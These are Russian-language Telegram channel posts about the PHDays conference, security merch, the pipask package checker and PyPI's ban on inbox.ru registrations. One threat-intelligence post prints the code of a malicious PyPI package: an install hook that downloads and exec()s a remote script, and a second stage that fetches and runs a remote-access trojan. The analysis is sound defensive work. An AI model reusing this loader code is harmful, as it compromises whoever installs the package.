🗓 Программа PHDays Fest в PDF

В ней указаны доклады и сессии, которые будут транслироваться онлайн. Посмотреть их можно в «VK Видео» и на Rutube. Программа может меняться, актуальная версия на отдельном сайте.

С доступом к нашему сайту наблюдаются проблемы, сейчас мы оперативно их устраняем и скоро он будет вновь доступен.

@PHDays. 22-24 мая. «Лужники»

Комрады, нам нужны нитро бусты

Чтобы радовать вас оперативными вестями с полей, прошу неравнодушных забустить канал.

А пока о том, как прошёл первый день phdays, можно посмотреть в сторисах @hexadec1mal 🤪

Также нам как добропорядочному каналу пора уже вводить кастомные реакции – приглашаю обсудить эту тему в комментариях.

Всем хорошей конфы 🐾

Что такое Positive Hacking Days?

Как заявляет ряд людей, это количество пройденных шагов. В моем случае это 44191 шаг 😼 Конечно, это не достижение, но всё равно вполне неплохо) Делитесь своими шагами в комментариях)

Как полагает ряд людей, это доклады и воркшопы. Я с ними согласен: экспертиза с разных уголков ИТ-сообщества наводит на интересные задумки, которые можно применить в своей работе ☕️

Как чувствует ряд людей, это соревнования. Красивым мерчем порадовали Positive Labs и F6 😎. Хотя было мемно увидеть стенд, где надо отдать свои персданные, затем выбрать один из 12 ключиков и одну из 12 ячеек, чтобы с шансом 1/12 (да, не 1/144, как сперва я подумал) получить содержимое ячейки.

Как считает ряд людей, это нетворкинг. Встретиться со знакомыми, когда жизнь нас развела в разные стороны — редкая возможность, которая становится существенно более реализуемой благодаря конференции 💃

В любом случае, я рад был повидаться со всеми, с кем работал, с кем пересекался по вузу и образовательным программам. Спасибо)

@disasm_me_ch

Думали отдохнуть после PHDays? Как бы не так 😈

В следующий вторник в Москве начнется конференция от @k8security — они занимаются ресёрчами в области безопасности контейнеров.
Организаторы выбрали вполне логичное и однозначно интерпретируемое название — 😁 БеКон

Ваш автор канала стал информационным партнером конференции, чтобы перестать использовать Docker Swarm и начать жить осветить мероприятие о современных трендах в области контейнерных сред.

Рекомендую конфу людям, ведущим неравный бой с кубером и/или занимающимся вопросами обеспечения безопасности контейнеров. Даже если не ради докладов (БеКон как порядочная конфа выкладывает записи выступлений), то ради нетворкинга и обмена практиками 💻

Надеюсь, когда-нибудь я одолею свой страх использования k8s в production-среде и спокойно отпущу Docker Swarm, который в какой-то момент перестал удовлетворять моим требованиям по гибкости оркестрации)

Увидимся на БеКоне 😼

@disasm_me_ch

Продолжаем обозревать мерч 📢

Несколько лет назад я участвовал в написании тасок для t-ctf @tctf_channel вместе с @spbctf – и вот на прошлой неделе до меня доехала персональная капибара! 🙌

tctf{welc0m3_t0_c4pyb4r0vsk},
@disasm_me_ch

pipask — finally, a secure firewall? 😎

Недавно я писал о проекте Supply-Chain Firewall, задача которого блокировать установку вредоносных пакетов. К сожалению, в текущей реализации оказался не очень-то и безопасным.

Да, он проверяет наличие пакетов в базах Datadog и OSV.dev, но:
— В случае с pip/poetry делает это по факту установки, а значит вся вредоносная активность отработает. 🐈
— Так как используются базы фидов, такой firewall неэффективен против не занесенных туда угроз.

Нашел упоминание другого проекта, который выглядит по функционалу более мощно, но работает только с пакетным менеджером pip — pipask. Он заявляется как drop-in замена pip, которая поддерживает только команды install/download/list. pipask имеет целый арсенал проверок:
— Отозван (yanked) ли пакет. В PyPI можно мягко скрыть релиз, если в нем, например, найдены уязвимости, что не позволит его скачать без прямого указания версии.
— Как давно были созданы релиз, который является целью установки, и сам проект в принципе.
— Есть ли известные уязвимости в базе OSV.dev.
— Какова репутация связанного с проектом GitHub/GitLab-репозитория.
— Какой статус проекта указал разработчик (Planning, Pre-Alpha, Alpha, Beta, Inactive будут причиной для тревоги, Production/Stable и Mature будут ок);
— Сколько скачиваний пакета было за последний месяц по данным PyPI Stats (до 100 будут красным знаком, до 5000 будут причиной тревоги);
— Какая лицензия проекта.

Для транзитивных зависимостей ведётся проверка только на известные уязвимости в базе OSV, без прочих репутационных. 😎

Если pipask найдет проблемы с пакетом, он их подсветит и спросит решение пользователя, стоит ли его устанавливать:

$ pipask install yandex-baobab-api
✔️ Resolving dependencies to install 0:00:00
! Checking repository popularity    0:00:00
✖️ Checking package download stats   0:00:00
! Checking package age              0:00:00
✔️ Checking known vulnerabilities    0:00:00
✔️ Checking release metadata         0:00:00
! Checking package license          0:00:00

Package check results:
  [yandex-baobab-api==66.0.3]
    ! No repository URL found
    ✖️ Only 8 downloads from PyPI in the last month
    ! The release is older than a year: 472 days old
    ✔️ No known vulnerabilities found
    ✔️ No development status classifiers
    ! No license found in PyPI metadata - you may need to check manually

? Would you like to continue installing package(s)? [y/n]:

Кстати, в pip против install-time троянов есть режим --only-binary :all: — он не позволит установиться пакету, если у него есть только source distribution, требующий предварительной компиляции. Правда это может поломать пайплайны 🐈. pipask и scfw, тоже могут работать в этом режиме, так как пробрасывают параметры в pip.

———

Данное решение сейчас не поиспользуешь на проде, так как pipask пока не поддерживает возможность игнорировать предупреждения. Но как замена pip-у в рамках ручного скачивания пакетов — огонь. Для того же jupyter labs будет замечательно 😊

Блин, а я попробую использовать pipask у себя на тачке, выглядит годно!

#pypi #supplychain #ti #ресерч
@disasm_me_ch

Немного Python-рутины. Slavic vibes
Предыдущий пост цикла.

Дано: автор на PyPI с ником protocol.cpp, автор пакета justanything.

В ранней версии код был POC-ом, может даже показаться, что это багбаунти-/пентест-активность (рис.1). Обратите внимание на русскоязычный комментарий 💃

В версии 0.1.3 комментарий был убран, а нагрузка изменилась:

class CustomInstallCommand(install):
    def run(self):
        try:
            response = requests.get("https://[REDACTED1]/main.py")
            response.raise_for_status()
            exec(response.text)
        except requests.RequestException as e:
            print(f"Failed to fetch or execute script: {e}")
        super().run()

Следующий стейдж выглядит так:

def huinya():
    try:
        ssilka = 'https://[REDACTED2]/1.txt'
        ratka = "1.txt"
        huizhopaseks = requests.get(ssilka)
        with open(ratka,"wb") as file:   file.write(huizhopaseks.content)
        os.startfile(ratka)
    except Exception:
        pass

    
    user = getpass.getuser()
    hidden_path = Path.home() / ".dildo"
    with open(hidden_path, "w") as f:
        f.write(f"Infected! User: {user}\n")

huinya()

Данный код хорошо говорит сам за себя — будет скачан и запущен ратник (RAT, Remote Access Tool, троян с функционалом передачи управления над устройством жертвы злоумышленнику). Стейдж ратника получить не удалось, увы 🚶‍♀️

В последнее время среди троянов всё реже можно увидеть код, написанный человеческими руками. Хорошо, что в 2025 всё ещё существует лучик надежды 🐈

#ti #pypi
@disasm_me_ch

Обучаемся секьюрной разработке 😼

Хорошие новости: меня позвали рассказать интересности в рамках позитивного практикума AppSec для инженеров.

Практикум будет полезен DevOps-инженерам и программистам, которые заинтересованы в настройке процессов безопасной разработки. Во время подготовки материала я прошелся по курсу и нахожу его полезным для людей, кто очень хочет настроить адекватный поиск уязвимостей с использованием актуальных практик так, чтобы устранение проблем было не таким болезненным 👀

В одном из блоков третьей недели я покрою вопросы, котором часто не уделяют внимание при внедрении security-инструментов: кто поставляет информацию об уязвимых компонентах, почему эти люди решили помогать мировому комьюнити в данном нелегком пути и каковы качество и полнота этих фидов.

Программа длится 6 недель и стартует уже 30 июня ☕️

#курсы #appsec #supplychain #pypi #npm
@disasm_me_ch

Пентестерские хиханьки и хаханьки 😎

Компания Awillix проводит третье ежегодное мероприятие для offensive-специалистов — Pentest Award.

Инструкция для моих любимых пентестеров:
1. Знакомимся с кейсами победителей за 2023 (сайт), и 2024 года (сайт, статьи о кейсах на Хакере), вдохновляемся.
2. Проводим ревизию интересных кейсов, читаем номинации этого года и правила.
3. Публикуемся!) Wish you luck.

Инструкция для моих любимых синих команд:
1. Знакомимся с кейсами за 2023 и 2024.
2. Сравниваем наличие алертов на итоги этого года 🔥

———

Среди интересных похеков в 2024, относящихся к безопасности опенсорса, можно выделить ресёрч Михаила Сухова @Im10n, где он из сорсов расковырял недостаток работы FreeIPA, если кратко: можно было запросить user-to-user ticket чужого юзера, который шифруется напрямую ключом жертвы, вычисленным из её открытой соли и пароля.

Получив такой ticket, атакующий может брутфорсить пароли офлайн, что позволяет вскрыть учётки со слабыми паролями. Кейс признан вендором 🙌 и получил идентификатор CVE-2024-3183

———

Классно, что такие мероприятия проводятся — получается очень хороший обмен опытом. Прием заявок до 30 июня, бегите скорее)

#pentest
@disasm_me_ch

Сейчас в вагоне московского метро обнаружил "новый" формат qr-кодов

Безопасно отсканировал (яжбезопасник), ознакомился. My honest reaction: 🌚

✍️,
@disasm_me_ch


upd: в высоком качестве приложил в комментариях

Страсти вокруг PyPI: 🪰⮕🐘?

На прошлой неделе CNews выпустили новость: "Россиян погнали из сообщества Python. Пока только избранных, но критерии отбора до предела странные". В ней выясняется, что Python Package Index (PyPI), крупнейшее хранилище пакетов Python, запретила регистрацию новых пользователей с указанием почты на домене inbox.ru.

В официальном заявлении сказано, что с почтовых ящиков inbox.ru пришла волна спама – пользователи с такой почтой создали 250 профилей и добавили к ним свыше полутора тысяч проектов, которые якобы «обманывают пользователей и представляют угрозу безопасности» (leading to end-user confusion, abuse of resources, and potential security issues).

Блокировка россиян в различных комьюнити — животрепещущая тема. Её процитировали и другие издания.

@banksta:

Россиян изгоняют из сообщества программистов Python. Им запретили пользоваться репозиторием PyPI с пакетами для Python. Ограничения коснулись только тех, кто создает новый аккаунт с привязкой почты на inboxru и тех, кто хочет добавить такую почту в уже существующий профиль. Домен принадлежит Mailru.

@imaxairu:

Россиянам запретили пользоваться репозиторием PyPI с пакетами для Python

Ограничения коснулись только тех, кто создает новый аккаунт с привязкой почты на inbox .ru и тех, кто хочет добавить такую почту в уже существующий профиль

Домен принадлежит Mail .ru. На другие домены компании лимиты пока не распространяются

Команда Supply Chain Security активно сотрудничает с PyPI в области обнаружения троянов. Мы решили провалидировать, были ли действия администрации репозитория обоснованными.

#ti #pypi #pyanalysis #scs
@ptescalator
Пост 1/4
Продолжение⬇️

Даём оценку официальным заявлениям

CNews ссылаются на статью в блоге PyPI, выпущенную 15 июля 2025. В ней говорится, что, руководствуясь практикой блокировки мусорных почтовых доменов, они закрывают регистрацию новых пользователей в Python Package Index с использованием почты на домене inbox.ru.

Схожее решение администрация PyPI выносила и год назад, 16 июня 2024, в отношении доменов outlook.com и hotmail.com (принадлежат Microsoft) — они стали излюбленным решением для злоумышленников из-за простоты массовой регистрации доменов.

Следует уточнить, что для скачивания пакетов не требуется регистрация. Учётная запись нужна для публикации своих проектов.

PyPI приводит статистику:

9 июня: появилась первая учётная запись кампании.
11 июня: за 3 часа было создано 46 учётных записей.
24 июня: за 4 часа было создано 207 учётных записей.
С 26 июня по 7 июля ими было создано 1525 проектов:
2025-06-26  9
2025-06-27  295
2025-06-28  39
2025-06-29  119
2025-06-30  740
2025-07-01  249
2025-07-02  46
2025-07-10  16
2025-07-11  12

По нашему мнению не существует легитимного сценария, в котором одному пользователю потребуется столько учёток. Создавать большое количество проектов имеет смысл в борьбе с неймсквоттингом (на примере Яндекса), но для этого достаточно и одной учётки.

Обращаем внимание на последний абзац поста на PyPI (ниже перевод):

Надеемся, что мы сможем отменить это решение в будущем, когда будем более уверены в способности этого провайдера электронной почты предотвращать злоупотребления. Если вы работаете в этом провайдере, пожалуйста, напишите нам по адресу [email protected], чтобы обсудить это решение.

Давайте разберемся с кампанией.

#ti #pypi #pyanalysis #scs
@ptescalator
Пост 2/4
Продолжение⬇️

Оправдано ли внесение почты @inbox.ru в чёрный список?

В настоящее время при создании почтового ящика на @inbox.ru требуется номер телефона или учётная запись VK. Есть упоминание, что два года назад можно было обойтись без почты. Также можно создать до 10 анонимных ящиков к своей основной почте в рамках официального функционала mail.ru.

Вероятно немаловажную роль играет простота автоматизации и более простой обход эвристик на подозрительные действия, раз злоумышленник смог управлять 207 почтами в рамках 4 часов.

Зарегистрированных на PyPI разработчиков, привязавших почту @inbox.ru, "репрессии" не касаются — были заблокированы только "пользователи", участвовавшие в кампании. Нельзя создавать новые учётные записи или привязывать эти ящики к существующим аккаунтам.

Подводя итог

Ограничение создания новых учётных записей с использованием почты на @inbox.ru — закономерная реакция на кампанию, в рамках которой пара сотен учётных записей, зарегистрированных за короткое время, начинает творить беспредел.

Почтовые домены от Microsoft также год назад попали под блокировку, это дополнительно уменьшает вероятность, что в этих действиях выражается какое-либо предвзятое отношение.

Получился опенсорсный myth busters 👀

#ti #pypi #pyanalysis #scs
@ptescalator
Пост 4/4

Выяснились новые подробности по недавней кампании: https://habr.com/ru/news/931280/

После предыдущей публикации представитель материнской компании inbox.ru обратился к администраторам PyPI для обсуждения ситуации. Они выразили желание решить проблему и восстановить возможность регистрации учётных записей PyPI с адресами электронной почты из домена inbox.ru. Они подтвердили, что регистрация учётных записей пользователей PyPI была произведена внутренней службой безопасности «для предотвращения возможного злоупотребления внешними библиотеками для атак на наши системы».

Яндекс:
⭐️Создаёт одну учётку с названием Yandex Security Team;
⭐️Открыто пишет в проектах, что это заглушки для предотвращения dependency confusion. При попытке установить пакет вызывается исключение с разъяснениями.

VK:
🎎Регает 200+ учёток;
🎎В короткое время создаёт 1500+ пакетов, названия которых отсылают к VK, Steam, ExLlama, Kaspersky, а часть названий походит на явный dependency confusion и typosquatting (win32com, webdav2, requirements-cpu-txt);
🎎Внутри проекты не содержат никакого описания, что это действия команды безопасности VK;
🎎Пакет спокойно ставится.


Теперь мы знаем точно: работать безопасником в VK не скучно 👏

#pypi
@disasm_me_ch